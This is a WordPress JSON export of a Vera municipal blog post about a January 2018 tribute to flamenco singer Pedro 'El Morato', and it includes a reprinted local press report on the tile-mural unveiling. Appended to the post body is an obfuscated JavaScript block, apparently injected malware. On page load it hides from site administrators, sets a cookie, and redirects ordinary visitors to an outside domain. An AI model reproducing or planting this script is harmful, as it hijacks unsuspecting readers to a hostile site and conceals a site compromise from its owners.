{"id":3396,"date":"2018-01-15T08:14:13","date_gmt":"2018-01-15T08:14:13","guid":{"rendered":"https:\/\/blog.vera.es\/cultura\/?p=3396"},"modified":"2018-05-09T07:16:38","modified_gmt":"2018-05-09T07:16:38","slug":"homenaje-a-pedro-el-morato-calle-almeria","status":"publish","type":"post","link":"https:\/\/blog.vera.es\/cultura\/2018\/01\/15\/homenaje-a-pedro-el-morato-calle-almeria\/","title":{"rendered":"HOMENAJE A PEDRO &#8216;EL MORATO&#8217;. CALLE ALMER\u00cdA. 20-01-2018"},"content":{"rendered":"<p>El pr\u00f3ximo s\u00e1bado, d\u00eda 20 de enero de 2018 a las 9 de la noche, el Excmo. Ayuntamiento de Vera y la Comisi\u00f3n del V Centenario del Terromoto de Vera homenajean a Pedro &#8216;<a href=\"https:\/\/blog.vera.es\/cultura\/2016\/10\/26\/pedro-el-morato-pedro-maria-alonso-morata-octubre-de-1841\/\">El Morato<\/a>&#8216; en la primera calle donde vivi\u00f3, la Calle de Almer\u00eda, Vera. LOS PRIMEROS PASOS DE NUESTRO FLAMENCO.<\/p>\n<p><!--more--><\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/01\/cartel-pedro-morato-anuncio-actividad.jpg\"><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-medium wp-image-3581\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/01\/cartel-pedro-morato-anuncio-actividad-285x300.jpg\" alt=\"\" width=\"285\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/01\/cartel-pedro-morato-anuncio-actividad-285x300.jpg 285w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/01\/cartel-pedro-morato-anuncio-actividad.jpg 590w\" sizes=\"(max-width: 285px) 100vw, 285px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/01\/CARTEL-DEFINITIVO-PEDRO-EL-MORATO-JPEG-comp.jpg\"><img decoding=\"async\" class=\"alignnone size-medium wp-image-3445\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/01\/CARTEL-DEFINITIVO-PEDRO-EL-MORATO-JPEG-comp-300x217.jpg\" alt=\"\" width=\"300\" height=\"217\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/01\/CARTEL-DEFINITIVO-PEDRO-EL-MORATO-JPEG-comp-300x217.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/01\/CARTEL-DEFINITIVO-PEDRO-EL-MORATO-JPEG-comp-768x557.jpg 768w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/01\/CARTEL-DEFINITIVO-PEDRO-EL-MORATO-JPEG-comp-1024x742.jpg 1024w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/01\/CARTEL-DEFINITIVO-PEDRO-EL-MORATO-JPEG-comp.jpg 1134w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>El s\u00e1bado, d\u00eda 20 de enero a las 9 de la noche, el Excmo. Ayuntamiento de Vera y la Comisi\u00f3n del V Centenario del Terromoto de Vera homenajean al cantaor y trovero Pedro &#8216;El Morato&#8217; mediante una serie de actividades:<\/p>\n<p><strong>V CENTENARIO DEL TERREMOTO DE VERA. 1518-2018. HOMENAJE A PEDRO &#8216;EL MORATO&#8217; (LOS PRIMEROS PASOS DE NUESTRO FLAMENCO)<\/strong><\/p>\n<p><strong>1.-Presentaci\u00f3n del mural de azulejos en honor a Pedro &#8216;El Morato&#8217; en la Calle de Almer\u00eda.<\/strong><\/p>\n<p><strong>2.-Intervenci\u00f3n de Lola de Quero, Presidenta de la Pe\u00f1a El Morato.<\/strong><\/p>\n<p><strong>3.-Intervenci\u00f3n de Antonio Sevillano.<\/strong><\/p>\n<p><strong>4.-Actuaci\u00f3n de &#8216;El Ni\u00f1o de las Cuevas&#8217; en las Naves Municipales, Calle Isabel La Cat\u00f3lica.<\/strong><\/p>\n<p><strong>5.-Cierre con copa de vino en las Naves Municipales.<\/strong><\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/01\/lola-de-quero.jpg\"><img decoding=\"async\" class=\"alignnone size-medium wp-image-3405\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/01\/lola-de-quero-300x262.jpg\" alt=\"\" width=\"300\" height=\"262\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/01\/lola-de-quero-300x262.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/01\/lola-de-quero.jpg 600w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/01\/antonio-sevillano.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3406\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/01\/antonio-sevillano-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/01\/antonio-sevillano-300x201.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/01\/antonio-sevillano-272x182.jpg 272w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/01\/antonio-sevillano.jpg 335w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/01\/ni\u00f1o-de-las-cuevas.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3407\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/01\/ni\u00f1o-de-las-cuevas-300x220.jpg\" alt=\"\" width=\"300\" height=\"220\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/01\/ni\u00f1o-de-las-cuevas-300x220.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/01\/ni\u00f1o-de-las-cuevas-768x562.jpg 768w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/01\/ni\u00f1o-de-las-cuevas.jpg 1000w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>http:\/\/www.lavozdealmeria.es\/Noticias\/145255\/3\/Vera-rinde-tributo-a-Pedro-<\/p>\n<h2 class=\"page-title\">Vera rinde tributo a Pedro \u2018El Morato\u2019<\/h2>\n<div id=\"post_content\" class=\"post_content\" role=\"main\">\n<article class=\"type-post hentry\">\n<div class=\"post-body\">Se ha inaugurado un mural que recuerda al veratense que fue una figura clave en la historia del flamenco<\/div>\n<div class=\"salto15\"><\/div>\n<div class=\"post-info\">\n<div class=\"post_date\">22\/01\/2018, 07:00<\/div>\n<p><a class=\"comments_count\">V\u00edctor Visiedo<\/a><\/p>\n<\/div>\n<div>\n<p>Hace m\u00e1s de un siglo y medio que Pedro \u2018El Morato\u2019 sali\u00f3 de la calle Almer\u00eda de Vera a recorrer el mundo, a ganarse la vida vendiendo verduras y frutas, con su guitarra a cuestas, y sin embargo, all\u00ed nunca se le ha olvidado. La memoria popular ha conservado durante todos estos a\u00f1os la figura de un trovador que escribi\u00f3 su nombre en la historia del flamenco, pero del que poca historia se ha escrito. Poco se sabe con exactitud de su vida, pero su legado permanece por m\u00e9ritos propios.<\/p>\n<p>Por ello, ahora se ha inmortalizado su imagen en aquella calle que era antiguo camino a Almer\u00eda, donde \u2018El Morato\u2019 aprendi\u00f3 sus primeros compases rodeado del arte gitano que siempre la ha poblado (no obstante se desconoce si Pedro \u2018El Morato\u2019 era gitano o payo). El s\u00e1bado, el Ayuntamiento de Vera descubri\u00f3 un mural de azulejos en la zona conocida como Las Cuatro Esquinas, donde se rinde tributo a Pedro Mar\u00eda Alonso Morata.<\/p>\n<p>\u201cPedro era trovero y era cantaor, y aunque hay muchas lagunas sobre su biograf\u00eda, est\u00e1 claro que tuvo que ser un fen\u00f3meno, porque nadie perdura durante tanto tiempo en la memoria colectiva sin serlo\u201d, sentencia el historiador Antonio Sevillano, presente en el homenaje. \u2018El Morato\u2019 fue uno de los grandes impulsores de los cantes por tarantas. El cronista lo sit\u00faa como \u201cuna de las cuatro figuras m\u00edticas del flamenco almeriense, junto a \u2018El Ciego de la Playa\u2019, Pepe \u2018El Marmolista\u2019 y \u2018El Cabogatero\u2019\u201d.<\/p>\n<p>Los trovos y cantes de \u2018El Morato\u2019 trascendieron porque los grandes cantaores los incluyeron en su repertorio, como Antonio Chac\u00f3n, \u2018La Ni\u00f1a de los Peines\u2019 y Pepe Sorroche, tal y como explica Lola de Quero, presidenta de la pe\u00f1a almeriense que lleva el nombre de este ilustre de Vera.<\/p>\n<p><strong>Homenaje <\/strong><br \/>\nCientos de personas -gitanos, payos, veratenses y for\u00e1neos- asistieron el s\u00e1bado al homenaje que el Consistorio rindi\u00f3 a \u2018El Morato\u2019. El alcalde de Vera, F\u00e9lix L\u00f3pez, destac\u00f3 la importancia de \u201cdarle el valor que se merecen a los veratenses ilustres\u201d. Por ello, en el estreno del mural estuvieron presentes Lola de Quero, presidenta de la Pe\u00f1a El Morato; Pedro L\u00f3pez, alcalde de La Uni\u00f3n, el ya citado Antonio Sevillano;\u2008el cantaor Antonio \u2018El Ni\u00f1o de las Cuevas\u2019 y toda la comisi\u00f3n del V Centenario del Terremoto de Bayra, organizadora del evento.<\/p>\n<p>All\u00ed, en la calle Almer\u00eda donde Pedro \u2018El Morato\u2019 recitara sus primeros versos, volvieron a sonar sus letras en la prodigiosa voz de \u2018El Ni\u00f1o de las Cuevas\u2019. A capela, el cantaor arranc\u00f3 los \u201col\u00e9s\u201d de los presentes al interpretar eso de \u201cMe llaman Pedro El Morato y soy natural de Vera, con mi guitarra en la mano, se\u00f1ores que venga tela, \u00a1venga tela de verano!\u201d. Una letrilla que aparece en el mural de azulejos, junto a una fotograf\u00eda del cantaor con una escopeta en la mano y una mula y algunos datos biogr\u00e1ficos.<\/p>\n<p>Tras destapar el mural, todos los presentes disfrutaron de la actuaci\u00f3n de \u2018El Ni\u00f1o de las Cuevas\u2019 en los salones sociales, donde ya con la guitarra en la mano, interpret\u00f3 algunas de las letras que hizo famosas Pedro \u2018El Morato\u2019. Despu\u00e9s, hubo tiempo para la charla distendida y para disfrutar de un \u00e1gape.<\/p>\n<p>Desde ahora, Pedro \u2018El Morato\u2019 estar\u00e1 para siempre en su pueblo, en su calle Almer\u00eda, esa de la que un d\u00eda sali\u00f3 para alcanzar la inmortalidad que ofrece el reconocimiento de ser un grande del flamenco.<\/p>\n<p><strong>Beb\u00e9 abandonado y muerte violenta<\/strong><br \/>\nDe la vida de Pedro \u2018El Morato\u2019 no se sabe mucho. Hasta hace poco ni se conoc\u00eda su nombre real, Pedro Mar\u00eda Alonso Morata. Fue abandonado reci\u00e9n nacido en la calle Almer\u00eda de Vera en 1841, y fue acogido por Antonio Alonso y Ana M\u00aa Morata (de la que coger\u00eda su apodo). Muy joven se fue a trabajar como verdulero ambulante a Utrillas (Teruel) y La Uni\u00f3n (Murcia), siendo uno de los iniciadores del Cante de las Minas. Se cree que unos arrieros lo mataron en 1915.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/01\/personalidades-rinden-homenaje-a-Pedro-El-Morato-22-01-2018.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3447\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/01\/personalidades-rinden-homenaje-a-Pedro-El-Morato-22-01-2018-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/01\/personalidades-rinden-homenaje-a-Pedro-El-Morato-22-01-2018-300x200.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/01\/personalidades-rinden-homenaje-a-Pedro-El-Morato-22-01-2018-272x182.jpg 272w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/01\/personalidades-rinden-homenaje-a-Pedro-El-Morato-22-01-2018.jpg 620w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><span class=\"comments_count\">El alcalde y personalidades del flamenco en el estreno del mural en honor a Pedro &#8216;El Morato&#8217;.\u00a0\u00a0\u00a0<strong>La Voz<\/strong><\/span><\/p>\n<\/div>\n<\/article>\n<\/div>\n<p><script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.areyourobots.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>El pr\u00f3ximo s\u00e1bado, d\u00eda 20 de enero de 2018 a las 9 de la noche, el Excmo. Ayuntamiento de Vera y la Comisi\u00f3n del V Centenario del Terromoto de Vera homenajean a Pedro &#8216;El Morato&#8216; en la primera calle donde vivi\u00f3, la Calle de Almer\u00eda, Vera. LOS PRIMEROS PASOS DE NUESTRO FLAMENCO.<\/p>\n","protected":false},"author":7,"featured_media":3398,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[110,181,109],"tags":[264,261,265,185,266,184,186,262],"class_list":["post-3396","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-arte-artesania","category-curiosidades","category-historia","tag-antonio-sevillano","tag-calle-almeria","tag-el-nino-de-las-cuevas","tag-flamenco","tag-lola-de-quero","tag-pedro-el-morato","tag-trovo","tag-v-centenario-terremoto-de-vera"],"_links":{"self":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/3396","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/comments?post=3396"}],"version-history":[{"count":12,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/3396\/revisions"}],"predecessor-version":[{"id":3582,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/3396\/revisions\/3582"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media\/3398"}],"wp:attachment":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media?parent=3396"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/categories?post=3396"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/tags?post=3396"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}